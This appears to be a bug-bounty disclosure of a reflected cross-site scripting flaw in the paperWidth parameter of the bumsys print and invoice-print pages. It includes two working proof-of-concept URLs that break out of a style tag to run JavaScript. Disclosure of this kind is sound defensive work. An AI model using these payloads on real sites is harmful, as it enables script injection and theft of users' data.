Improper Neutralization of Input in paperWidth param During Web Page Generation in unilogies/bumsys
Valid
Reported on
Feb 22nd 2023
Module : print and invoice-print Parameter : paperWidth
Attacker would be able to close the <style>
tag and can inject html tags
POC : http://demo.bumsys.org/print?&paperWidth=;}%3C/style%3E%3Cbody+onpageshow=alert(document.domain)%3E
POC : http://demo.bumsys.org/invoice-print/?&paperWidth=;}%3C/style%3E%3Cbody+onpageshow=alert(document.domain)%3E&msg=%3Ca%3E
Impact
It could lead to steal data using javascript execution.
We are processing your report and will contact the
unilogies/bumsys
team within 24 hours.
a month ago
The researcher's credibility has increased: +7
to join this conversation